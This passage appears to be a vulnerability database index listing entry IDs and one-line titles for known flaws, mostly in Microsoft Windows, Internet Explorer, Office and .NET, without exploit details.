Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1977] Microsoft Windows NT RPC services can be used to deplete system resources [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [17] Microsoft Windows NT RPC locator denial of service [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta [86263] National Instruments LabWindows/CVI unspecified [86261] ABB DataManager National Instruments LabWindows/CVI, LabVIEW unspecified [86088] Microsoft Internet Explorer CVE-2013-3199 code execution [86087] Microsoft Internet Explorer CVE-2013-3194 code execution [86086] Microsoft Internet Explorer CVE-2013-3193 code execution [86085] Microsoft Internet Explorer CVE-2013-3191 code execution [86084] Microsoft Internet Explorer CVE-2013-3190 code execution [86083] Microsoft Internet Explorer CVE-2013-3189 code execution [86082] Microsoft Internet Explorer CVE-2013-3188 code execution [86081] Microsoft Internet Explorer CVE-2013-3187 code execution [86080] Microsoft Internet Explorer CVE-2013-3184 code execution [86079] Microsoft Internet Explorer EUC-JP information disclosure [86078] Microsoft Internet Explorer integrity level privilege escalation [85802] Microsoft PowerPoint denial of service [85762] Microsoft Internet Explorer sandbox bypass [85276] Cisco Jabber for Windows denial of service [85242] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85241] Microsoft .NET Framework and Microsoft Silverlight code execution [85240] Microsoft .NET Framework and Microsoft Silverlight code execution [85239] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85238] Microsoft .NET Framework and Microsoft Silverlight privilege escalation [85237] Microsoft .NET Framework and Microsoft Silverlight code execution [85222] Microsoft Internet Explorer Shift JIS information disclosure [85221] Microsoft Internet Explorer CVE-2013-3164 code execution [85220] Microsoft Internet Explorer CVE-2013-3163 code execution [85219] Microsoft Internet Explorer CVE-2013-3162 code execution [85218] Microsoft Internet Explorer CVE-2013-3161 code execution [85217] Microsoft Internet Explorer CVE-2013-3153 code execution [85216] Microsoft Internet Explorer CVE-2013-3152 code execution [85215] Microsoft Internet Explorer CVE-2013-3151 code execution [85214] Microsoft Internet Explorer CVE-2013-3150 code execution [85213] Microsoft Internet Explorer CVE-2013-3149 code execution [85212] Microsoft Internet Explorer CVE-2013-3148 code execution [85211] Microsoft Internet Explorer CVE-2013-3147 code execution [85210] Microsoft Internet Explorer CVE-2013-3146 code execution [85209] Microsoft Internet Explorer CVE-2013-3145 code execution [85208] Microsoft Internet Explorer CVE-2013-3144 code execution [85207] Microsoft Internet Explorer CVE-2013-3143 code execution [85206] Microsoft Internet Explorer CVE-2013-3115 code execution [85204] Microsoft DirectShow code execution [85133] Microsoft Outlook phishing [84965] Microsoft Sharepoint Online cross site scripting [84916] Microsoft Internet Explorer ASLR information disclosure [84691] Microsoft Internet Explorer code execution [84690] Microsoft Internet Explorer code execution [84616] Microsoft Office code execution [84612] Microsoft Internet Explorer code execution [84611] Microsoft Internet Explorer code execution [84610] Microsoft Internet Explorer code execution [84609] Microsoft Internet Explorer code execution [84608] Microsoft Internet Explorer code execution [84607] Microsoft Internet Explorer code execution [84606] Microsoft Internet Explorer code execution [84605] Microsoft Internet Explorer code execution [84604] Microsoft Internet Explorer code execution [84603] Microsoft Internet Explorer code execution [84602] Microsoft Internet Explorer code execution [84601] Microsoft Internet Explorer code execution [84599] Microsoft Internet Explorer code execution [84598] Microsoft Internet Explorer code execution [84597] Microsoft Internet Explorer code execution [84596] Microsoft Internet Explorer code execution [84595] Microsoft Internet Explorer code execution [84581] Novell Client for Windows NWFS.SYS buffer overflow [84580] Novell Client for Windows NICM.SYS privilege escalation [84266] Multiple Microsoft products code execution [84019] Microsoft Internet Explorer MSXML information disclosure [84011] Microsoft Security Essentials privilege escalation [84007] Microsoft Internet Explorer CGenericElement object code execution [84002] DotNetNuke modal windows cross-site scripting [83995] Microsoft Internet Explorer code execution [83909] Microsoft Internet Explorer code execution [83908] Microsoft Internet Explorer code execution [83907] Microsoft Internet Explorer code execution [83906] Microsoft Internet Explorer code execution [83905] Microsoft Internet Explorer code execution [83904] Microsoft Internet Explorer code execution [83903] Microsoft Internet Explorer code execution [83902] Microsoft Internet Explorer code execution [83901] Microsoft Internet Explorer code execution [83900] Microsoft Internet Explorer code execution [83899] Microsoft Internet Explorer information disclosure [83897] Microsoft Publisher buffer underflow [83896] Microsoft Publisher code execution [83895] Microsoft Publisher code execution [83894] Microsoft Publisher code execution [83893] Microsoft Publisher code execution [83892] Microsoft Publisher code execution [83891] Microsoft Publisher buffer overflow [83890] Microsoft Publisher code execution [83889] Microsoft Publisher code execution [83888] Microsoft Publisher integer overflow [83887] Microsoft Publisher code execution [83885] Microsoft Word code execution [83883] Microsoft Visio information disclosure [83881] Microsoft Lync code execution [83879] Microsoft .NET Framework security bypass [83878] Microsoft .NET Framework spoofing [83191] Microsoft Internet Explorer code execution [83190] Microsoft Internet Explorer code execution [83172] Skype for Windows multiple unspecified [83092] Microsoft Remote Desktop ActiveX control code execution [83087] Microsoft SharePoint information disclosure [83085] Microsoft Antimalware Client privilege escalation [83083] Microsoft SharePoint and Microsoft Office Web Apps privilege escalation [82975] NVIDIA Graphics Drivers for Windows privilege escalation [82974] NVIDIA Graphics Drivers for Windows privilege escalation [82771] Microsoft Internet Explorer sandbox denial of service [82766] NVIDIA Graphics Drivers for Windows privilege escalation [82731] Microsoft Internet Explorer CTreeNode code execution [82443] Microsoft Office code execution [82423] Microsoft Silverlight code execution [82421] Microsoft SharePoint W3WP denial of service [82420] Microsoft SharePoint input privilege escalation [82419] Microsoft SharePoint JavaScript privilege escalation [82418] Microsoft SharePoint Callback privilege escalation [82416] Microsoft Visio Viewer memory code execution [82409] Microsoft Internet Explorer removeChild code execution [82408] Microsoft Internet Explorer onBeforeCopy code execution [82407] Microsoft Internet Explorer GetMarkupPtr code execution [82406] Microsoft Internet Explorer CElement code execution [82405] Microsoft Internet Explorer CCaret code execution [82404] Microsoft Internet Explorer CMarkupBehaviorContext code execution [82403] Microsoft Internet Explorer saveHistory code execution [82402] Microsoft Internet Explorer OnResize code execution [82400] Microsoft Office for Mac information disclosure [82398] Microsoft Office OneNote information disclosure [81900] Microsoft Skype GiftCards cross-site scripting [81728] Microsoft Internet Explorer SRC information disclosure [81706] Microsoft Internet Explorer SSL lock spoofng [81705] Microsoft Internet Explorer TCP sessions information disclosure [81667] Microsoft .NET Framework WinForms privilege escalation [81633] Microsoft Internet Explorer CObjectElement code execution [81631] Microsoft Internet Explorer InsertElement code execution [81630] Microsoft Internet Explorer SLayoutRun code execution [81629] Microsoft Internet Explorer pasteHTML code execution [81628] Microsoft Internet Explorer CDispNode code execution [81627] Microsoft Internet Explorer LsGetTrailInfo code execution [81626] Microsoft Internet Explorer vtable code execution [81625] Microsoft Internet Explorer CMarkup code execution [81624] Microsoft Internet Explorer COmWindowProxy code execution [81623] Microsoft Internet Explorer SetCapture code execution [81622] Microsoft Internet Explorer Shift JIS information disclosure [81212] Microsoft Lync User-Agent cross-site scripting [80885] Microsoft Internet Explorer CDwnBindInfo code execution [80871] Microsoft .NET Framework permission privilege escalation [80870] Microsoft .NET Framework S.D.S.P. privilege escalation [80868] Microsoft .NET Framework information disclosure [80866] Microsoft .NET Framework OData denial of service [80847] NVIDIA Graphics Drivers for Windows buffer overflow [80750] Microsoft Internet Explorer denial of service [80647] Microsoft Internet Explorer cursor information disclosure [80523] Microsoft Exchange Server RSS feeds denial of service [80364] Microsoft Internet Explorer improper ref counting code execution [80363] "Microsoft Internet Explorer CMarkup code execution" [80362] Microsoft Internet Explorer InjectHTMLStream code execution [80355] Microsoft Word RTF code execution [80310] Microsoft Internet Explorer CHTML code execution [80149] Microsoft Office OneNote code execution [79998] Microsoft Excel file code execution [79997] Microsoft Visio code execution [79996] Microsoft Publisher code execution [79990] Microsoft Excel xls code execution [79749] Microsoft Internet Explorer multiple unspecified code execution [79748] Microsoft Internet Explorer memory code execution [79692] Microsoft .NET Framework reflection privilege escalation [79691] Microsoft .NET Framework Web proxy code execution [79690] Microsoft .NET Framework DLL code execution [79689] Microsoft .NET Framework output information disclosure [79688] Microsoft .NET Framework reflection privilege escalation [79686] Microsoft Internet Explorer CTreeNode code execution [79685] Microsoft Internet Explorer CTreePos code execution [79684] Microsoft Internet Explorer CFormElement code execution [79674] Microsoft Excel data structure buffer overflow [79651] Microsoft Paint .bmp denial of service [79650] Microsoft Excel code execution [79649] Microsoft Office Publisher denial of service [79614] Microsoft Internet Explorer scrollIntoView code execution [79599] Microsoft Office Picture Manager code execution [79590] Microsoft Word .doc buffer overflow [79492] Microsoft Internet Explorer filter cross-site scripting [79251] Microsoft Internet Explorer CPasteCommand code execution [79231] EMC NetWorker Module for Microsoft Applications (NMM) administrator credential disclosure [79230] EMC NetWorker Module for Microsoft Applications (NMM) communication channel code execution [79198] Microsoft Excel code execution [78863] Microsoft Works RTF code execution [78857] Microsoft SQL Server cross-site scripting [78852] Microsoft Lync and Microsoft SharePoint privilege escalation [78850] Microsoft Office RTF fiiles code execution [78849] Microsoft Word PAPX code execution [78822] Google Chrome CVE-2012-2897 Windows kernel memory corruption [78759] Microsoft Internet Explorer cloneNode() code execution [78758] Microsoft Internet Explorer Layout object code execution [78757] Microsoft Internet Explorer Event Listener code execution [78756] Microsoft Internet Explorer onMove() code execution [78598] Microsoft Internet Explorer use-after-free code execution [78076] Microsoft System Center Configuration Manager cross-site scripting [78074] Microsoft Excel SST Invalid Length code execution [78073] Microsoft Excel code execution [78070] Microsoft System Center Operations Manager cross-site scripting [78069] Microsoft System Center Operations Manager cross-site scripting [77993] Microsoft Indexing Service ActiveX control denial of service [77878] Microsoft MS-CHAP v2 information disclosure [77361] Microsoft Visio DXF buffer overflow [77359] Microsoft Internet Information Services FTP information disclosure [77358] Microsoft Internet Information Services log files information disclosure [77351] Microsoft Office CGM code execution [77345] Microsoft Internet Explorer virtual function table code execution [77344] Microsoft Internet Explorer null object code execution [77343] Microsoft Internet Explorer layout memory code execution [77324] Microsoft Visual Studio Team Foundation Server cross-site scripting [77317] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [77316] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [76807] Microsoft Office for Mac privilege escalation [76743] Microsoft .NET Framework tilde denial of service [76723] Microsoft Internet Explorer attribute code execution [76722] Microsoft Internet Explorer cached code execution [76717] Microsoft Data Access Components XML code execution [76716] Microsoft IIS FTP denial of service [76710] Microsoft SharePoint JavaScript cross-site scripting [76709] Microsoft SharePoint URL spoofing [76708] Microsoft SharePoint JavaScript cross-site scripting [76706] Microsoft SharePoint scriptresx.ashx cross-site scripting [76664] Microsoft IIS tilde information disclosure [76339] XAMPP for Windows cds.php and perlinfo.pl cross-site scripting [76338] XAMPP for Windows cds.php SQL injection [76306] Opera pop-up windows code execution [76185] Microsoft Internet Information Server ASPX information disclosure [76184] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76183] Microsoft Internet Information Server INDEX_ALLOCATION security bypass [76182] Microsoft Internet Information Server request security bypass [75983] MapServer for Windows Apache file include [75977] Microsoft WordPad .doc denial of service [75962] Microsoft Internet Explorer Scrolling Events information disclosure [75961] Microsoft Internet Explorer OnRowsInserted Event code execution [75960] Microsoft Internet Explorer insertRow code execution [75959] Microsoft Internet Explorer insertAdjacentText code execution [75958] Microsoft Internet Explorer OnBeforeDeactivate Event code execution [75957] Microsoft Internet Explorer Title Element Change code execution [75956] Microsoft Internet Explorer Col Element code execution [75955] Microsoft Internet Explorer same id property code execution [75954] Microsoft Internet Explorer Developer Toolbar code execution [75953] Microsoft Internet Explorer process memory information disclosure [75952] Microsoft Internet Explorer EUC-JP character information disclosure [75950] Microsoft Internet Explorer Center Element code execution [75948] Microsoft Visual Basic for Applications DLL code execution [75941] Microsoft .NET Framework function code execution [75925] Microsoft Dynamics AX Enterprise Portal cross-site scripting [75904] Microsoft Lync HTML information disclosure [75903] Microsoft Lync DLL code execution [75163] Microsoft Visual Studio linker buffer overflow [75135] Microsoft Silverlight XAML code execution [75134] Microsoft .NET Framework index denial of service [75133] Microsoft .NET Framework buffer code execution [75122] Microsoft Office RTF code execution [75119] Microsoft Excel series record code execution [75118] Microsoft Excel MergeCells buffer overflow [75117] Microsoft Excel SXLI code execution [75115] Microsoft Visio Viewer memory code execution [75098] Microsoft .NET Framework EncoderParameter buffer overflow [74555] Microsoft Office WPS Converter buffer overflow [74383] Microsoft Internet Explorer VML code execution [74382] Microsoft Internet Explorer SelectAll code execution [74381] "Microsoft Internet Explorer OnReadyStateChange code execution" [74380] Microsoft Internet Explorer JScript9 code execution [74379] Microsoft Internet Explorer HTML page code execution [74377] Microsoft .NET Framework parameter code execution [74376] Microsoft .NET Framework input code execution [74375] Microsoft .NET Framework serialization code execution [74368] Microsoft Forefront Unified Access Gateway information disclosure [74367] Microsoft Forefront Unified Access Gateway spoofing [73870] Microsoft Internet Explorer Protected Mode denial of service [73869] Microsoft Internet Explorer unspecified buffer overflow [73539] Microsoft DirectWrite denial of service [73537] Microsoft Visual Studio privilege escalation [73535] Microsoft Expression Design code execution [73029] Microsoft Internet Explorer BODY denial of service [72938] Skype for Windows unspecified [72886] Microsoft SharePoint wizardlist.aspx cross-site scripting [72885] Microsoft SharePoint themeweb.aspx cross-site scripting [72884] Microsoft SharePoint inplview.aspx cross-site scripting [72872] Microsoft Excel bytes code execution [72871] Microsoft Excel OBJECTLINK record code execution [72870] Microsoft Excel file code execution [72864] Microsoft Visio attributes code execution [72863] Microsoft Visio code execution [72862] Microsoft Visio Viewer code execution [72861] Microsoft Visio attributes code execution [72860] Microsoft Visio Viewer code execution [72848] Microsoft .NET Framework buffer overflow [72847] Microsoft .NET Framework and Microsoft Silverlight unmanaged objects code execution [72845] Microsoft Internet Explorer VML code execution [72844] Microsoft Internet Explorer memory information disclosure [72843] Microsoft Internet Explorer HtmlLayout code execution [72842] Microsoft Internet Explorer copy and paste information disclosure [72028] Microsoft ASP.NET forms authentication open redirect [72027] Microsoft ASP.NET forms authentication security bypass [72026] Microsoft ASP.NET forms authentication ticket caching privilege escalation [71990] Microsoft Anti-Cross Site Scripting Library security bypass [71989] Microsoft ASP.NET CaseInsensitiveHashProvider.getHashCode() function denial of service [71817] Microsoft Internet Explorer CSS information disclosure [71813] Microsoft Internet Explorer getComputedStyle information disclosure [71808] Microsoft .NET Framework SaveAs() security bypass [71635] Microsoft Internet Explorer cache objects information disclosure [71561] Microsoft Excel record memory code execution [71556] Microsoft PowerPoint record code execution [71555] Microsoft PowerPoint DLL code execution [71547] Microsoft Time binary code execution [71545] Microsoft Internet Explorer Content-Disposition information disclosure [71544] Microsoft Internet Explorer HTML DLL code execution [71543] Microsoft Internet Explorer cross-site scripting filter information disclosure [71541] Microsoft Publisher memory code execution [71540] Microsoft Publisher pointer code execution [71539] Microsoft Publisher out-of-bounds code execution [71537] Microsoft Word memory code execution [71200] Mozilla Firefox and Thunderbird Windows D2D security bypass [71117] Microsoft Excel vbscript macro code execution [70565] Microsoft Publisher pubconv.dll buffer overflow [70564] WebKit DOM windows cross-site scripting [70337] OpenOffice.org Microsoft Word .doc sprm file parser denial of service [70148] Microsoft Host Integration Server UDP denial of service [70139] Microsoft Office IME privilege escalation [70128] Microsoft Internet Explorer Body Element code execution [70126] "Microsoft Internet Explorer Jscript9.dll code execution" [70125] Microsoft Internet Explorer Onload Event code execution [70124] Microsoft Internet Explorer Option Element code execution [70123] "Microsoft Internet Explorer OLEAuto32.dll code execution" [70122] Microsoft Internet Explorer Scroll Event code execution [70107] Microsoft Forefront Unified Access Gateway NULL denial of service [70106] Microsoft Forefront Unified Access Gateway applet code execution [70105] Microsoft Forefront Unified Access Gateway cross-site scripting [70104] Microsoft Forefront Unified Access Gateway ExcelTable cross-site scripting [70103] Microsoft Forefront Unified Access Gateway ExcelTable response splitting [69863] Google Chrome Windows Media Player plug-in unspecified [69826] Microsoft SharePoint Server Source open redirect [69500] Microsoft Office object pointer code execution [69499] Microsoft Office DLL code execution [69497] Microsoft Excel integer code execution [69496] Microsoft Excel expression code execution [69495] Microsoft Excel records code execution [69494] Microsoft Excel array code execution [69493] Microsoft Excel WriteAV code execution [69344] Microsoft compound document detected [69293] Microsoft Internet Explorer HTTPS security bypass [69229] Mozilla Firefox, Thunderbird, and SeaMonkey Windows D2D hardware acceleration security bypass [69214] Microsoft Internet Explorer Iedvtool.dll denial of service [68855] HP Arcsight Connector Appliance Windows Event Log SmartConnector privilege escalation [68835] Microsoft SharePoint EditForm.aspx cross-site scripting [68834] Microsoft SharePoint cross-site scripting [68832] Microsoft Chart control information disclosure [68828] Microsoft .NET Framework socket information disclosure [68826] Microsoft Report Viewer information disclosure [68822] Microsoft Internet Explorer style code execution [68821] Microsoft Internet Explorer xslt code execution [68820] Microsoft Internet Explorer character sequences information [68819] Microsoft Internet Explorer telnet URI code execution [68818] Microsoft Internet Explorer event handlers information disclosure [68817] Microsoft Internet Explorer race condition code execution [68811] Microsoft Visio pStream code execution [68810] Microsoft Visio Move Around the Block code execution [68786] Microsoft Internet Explorer EUC-JP cross-site scripting [68554] Citrix Access Gateway Plug-in for Windows ActiveX control buffer overflow [68498] Microsoft Internet Explorer memory layout information disclosure [68226] Apple Mac OS X QuickLook Microsoft Office files code execution [68024] Microsoft Office XP remote code execution [68007] Microsoft Word wdGetApplicationObject() code execution [67991] Microsoft Lync Server ReachJoin.aspx command execution [67954] Microsoft Internet Explorer HTTP redirect code execution [67953] Microsoft Internet Explorer selection object code execution [67952] Microsoft Internet Explorer layout code execution [67951] Microsoft Internet Explorer drag and drop information disclosure [67950] Microsoft Internet Explorer DOM code execution [67949] Microsoft Internet Explorer time element code execution [67948] Microsoft Internet Explorer drag and drop code execution [67947] Microsoft Internet Explorer toStaticHTML API information disclosure [67946] Microsoft Internet Explorer DOM code execution [67945] Microsoft Internet Explorer link properties code execution [67944] Microsoft Internet Explorer Web pages information disclosure [67890] Microsoft Internet Explorer cross-zone drag-and-drop information disclosure [67761] Microsoft XML Editor Web Service Discovery information disclosure [67752] Microsoft .NET Framework and Microsoft Silverlight XAML code execution [67736] Microsoft Forefront Threat Management Gateway TMG Firewall Client buffer overflow [67717] Microsoft Excel WriteAV code execution [67716] Microsoft Excel WriteAV code execution [67715] Microsoft Excel information code execution [67714] Microsoft Excel record information buffer overflow [67713] Microsoft Excel record buffer overflow [67712] Microsoft Excel array code execution [67711] Microsoft Excel information code execution [67710] Microsoft Excel Excel record code execution [67662] Symantec Backup Exec for Windows Servers communication man-in-the-middle [67411] Microsoft .NET Framework JIT compiler code execution [67301] Microsoft PowerPoint presentation code execution [67300] Microsoft PowerPoint presentation code execution [66991] Microsoft Internet Explorer CSS address bar spoofing [66976] HP Insight Control Performance Management for Windows unspecified cross-site requets forgery [66975] HP Insight Control Performance Management for Windows unspecified privilege escalation [66847] Microosft Windows WebDAV code execution [66729] Microsoft HTML Help CHM buffer overflow [66710] Microsoft Reader aud_file.dll code execution [66709] Microsoft Reader eBook buffer overflow [66708] Microsoft Reader msreader.exe buffer overflow [66544] A Microsoft FAX cover sheet has been detected [66435] Microsoft Internet Explorer Javascript information disclosure [66434] Microsoft Internet Explorer frame tag information disclosure [66433] Microsoft Internet Explorer layout code execution [66426] Microsoft Office DLL code execution [66393] Microsoft WordPad code execution [66137] Microsoft Source Code Analyzer for SQL injection privilge escalation [66066] Windows Movie Maker .avi buffer overflow [66064] Microsoft Internet Explorer unspecified code execution [66063] Microsoft Internet Explorer unspecified code execution [66062] Microsoft Internet Explorer unspecified code execution [66025] Microsoft Internet Explorer XSLT information disclosure [65918] Microsoft Internet Explorer address bar spoofing [65867] Microsoft Visual Studio project file buffer overflow [65626] Microsoft Malware Protection Engine privilege escalation [65587] Microsoft Excel data code execution [65586] Microsoft Excel memory record buffer overflow [65585] Microsoft Excel memory corruption code execution [65584] Microsoft Excel WriteAV code execution [65583] Microsoft Excel memory buffer overflow [65582] Microsoft Excel buffer code execution [65579] Microsoft PowerPoint persist directory code execution [65578] Microsoft PowerPoint Techno-color code execution [65572] Microsoft Office Groove DLL code execution [65192] Microsoft PowerPoint OfficeArt code execution [65191] Microsoft Office graphic code execution [65190] Microsoft Excel Axis properties code execution [65188] Microsoft Excel art object code execution [65187] Microsoft Excel object code execution [64924] Microsoft Visio data type code execution [64923] Microsoft Visio object code execution [64913] Microsoft Internet Explorer DLL code execution [64912] Microsoft Internet Explorer code execution [64911] Microsoft Internet Explorer code execution [64908] Microsoft .NET Framework JIT code execution [64903] Microsoft DirectShow DLL code execution [64571] Microsoft Internet Explorer GUI weak security [64482] Microsoft Internet Explorer ReleaseInterface() code execution [64341] Microsoft Data Access Components (MDAC) ADO record code execution [64340] Microsoft Data Access Components (MDAC) ODBC buffer overflow [64250] Microsoft WMI Administrative Tools ActiveX control (WBEMSingleView.ocx) code execution [64248] Microsoft Internet Information Services TELNET_STREAM_CONTEXT::OnSendData buffer overflow [64196] HAURI Windows Server and ViRobot Desktop VRsecos.sys privilege escalation [64083] Microsoft Foundation Class DLL code execution [64075] Windows Live Mail dynamic-linked library (dwmapi.dll) code execution [63915] Microsoft Data Access Objects (DAO) dynamic-linked library (DLL) code execution [63879] Windows Server 2008 Color Control Panel dynamic-linked library (DLL) code execution [63866] Microsoft Visio dynamic-linked library (DLL) code execution [63840] Microsoft Visual C++ 2008 Redistributable Package dynamic-linked library (DLL) code execution [63815] Microsoft Remote Desktop Protocol dynamic-linked library (ieframe.dll) code execution [63802] Microsoft Visio dynamic-linked library (dwmapi.dll) code execution [63780] Microsoft PowerPoint 2007 dynamic-linked library (rpawinet.dll) code execution [63775] Microsoft Visio 2003 dynamic-linked library (mfc71enu.dll) code execution [63749] Microsoft Internet Explorer CSS code execution [63581] Microsoft Address Book insecure library loading code execution [63572] Microsoft Exchange Server RPC denial of service [63557] Microsoft Internet Explorer information disclosure [63556] Microsoft Internet Explorer element code execution [63555] Microsoft Internet Explorer HTML element code execution [63553] Microsoft Internet Explorer object code execution [63552] Microsoft Internet Explorer script information disclosure [63551] Microsoft Internet Explorer HTML object code execution [63545] Microsoft Sharepoint SOAP code execution [63543] Microsoft Publisher array indexing memory corruption code execution [63542] Microsoft Publisher memory corruption code execution [63541] Microsoft Publisher pubconv.dll code execution [63540] Microsoft Publisher pubconv.dll buffer overflow [63539] Microsoft Publisher pubconv.dll code execution [63536] Microsoft Office FlashPix code execution [63535] Microsoft Office FlashPix buffer overflow [63534] Microsoft Office TIFF image code execution [63533] Microsoft Office TIFF image files [63532] Microsoft Office TIFF image buffer overflow [63531] Microsoft Office PICT code execution [63530] Microsoft Office CGM Image buffer overflow [63514] Microsoft Outlook file attachment denial of service [62962] Microsoft Internet Explorer invalid flag code execution [62886] HP Insight Control Performance Management for Windows unspecified privilege escalation [62885] HP Insight Control Performance Management for Windows unspecified cross-site request forgery [62884] HP Insight Control Performance Management for Windows unspecified cross-site scripting [62883] HP Insight Control Performance Management for Windows information disclosure [62864] HP Insight Recovery for Windows information disclosure [62863] HP Insight Recovery for Windows unspecified cross-site scripting [62862] HP Insight Orchestration for Windows information disclosure [62861] HP Insight Orchestration for Windows unauthorized access [62860] HP Insight Managed System Setup Wizard for Windows information disclosure [62804] Microsoft Forefront Unified Access Gateway Sginurl.asp cross-site scripting [62803] Microsoft Forefront Unified Access Gateway Mobile Portal cross-site scripting [62802] Microsoft Forefront Unified Access Gateway Web monitor cross-site scripting [62801] Microsoft Forefront Unified Access Gateway spoofing [62792] Microsoft PowerPoint underflow code execution [62791] Microsoft PowerPoint PowerPoint buffer overflow [62788] Microsoft Office DLL code execution [62787] Microsoft Office SPID code execution [62786] Microsoft Office drawing code execution [62785] Microsoft Office art drawing code execution [62784] Microsoft Office RTF buffer overflow [62783] HP Insight Control Server Migration for Windows unauthorized access [62782] HP Insight Control Server Migration for Windows unspecified privilege escalation [62781] HP Insight Control Server Migration for Windows unspecified cross-site scripting [62778] HP Insight Control Power Management for Windows unspecified cross-site request forgery [62777] HP Insight Control Power Management for Windows unspecified cross-site scripting [62728] Microsoft Internet Explorer window.onerror information disclosure [62469] Oracle Sun Products Directory Server Enterprise Edition Identity Synchronization for Windows unspecified [62259] Novell Client for Windows ActiveX control denial of service [62186] Microsoft Internet Information Services directory names code execution [62146] Microsoft .NET Framework JIT compiler code execution [62128] Microsoft Foundation Class (MFC) library title buffer overflow [62117] Microsoft Excel ghost record type parsing code execution [62116] Microsoft Excel out-of-bounds memory write in parsing code execution [62115] Microsoft Excel real time data array record code execution [62114] Microsoft Excel extra out of boundary record parsing code execution [62113] Microsoft Excel negative future function code execution [62112] Microsoft Excel merge cell record pointer code execution [62111] Microsoft Excel out of bounds array code execution [62110] Microsoft Excel formula biff record code execution [62109] Microsoft Excel formula substream memory corruption code execution [62108] Microsoft Excel Lotus 1-2-3 file parsing code execution [62107] Microsoft Excel file format parsing code execution [62106] Microsoft Excel record parsing memory corruption code execution [62105] Microsoft Excel record parsing integer overflow code execution [62097] Microsoft Word Word file code execution [62096] Microsoft Word file code execution [62095] Microsoft Word indexes code execution [62094] Microsoft Word records buffer overflow [62093] Microsoft Word pointers code execution [62090] Microsoft Internet Explorer deleted object code execution [62089] Microsoft Internet Explorer script information disclosure [62088] Microsoft Internet Explorer deleted object code execution [62087] Microsoft Internet Explorer object code execution [62086] Microsoft Internet Explorer Anchor element information disclosure [62085] Microsoft Internet Explorer deleted object code execution [62084] Microsoft Internet Explorer CSS information disclosure [62083] Microsoft Internet Explorer toStaticHTML API information disclosure [62082] Microsoft Internet Explorer AutoComplete information disclosure [62079] Microsoft Word bookmarks code execution [62078] Microsoft Word return values code execution [62077] Microsoft Word stack code execution [62076] Microsoft Word index code execution [62075] Microsoft Word boundary check code execution [62074] Microsoft Word pointer code execution [61937] Microsoft Word MSO.dll denial of service [61916] Microsoft DRM technology ActiveX control code execution [61913] Microsoft Internet Explorer toStaticHTML cross-site scripting [61898] Microsoft ASP.NET padding information disclosure [61894] Microsoft Paint BMP denial of service [61636] Microsoft Exchange Server Outlook Web Access cross-site request forgery [61516] Microsoft WordPad Word 97 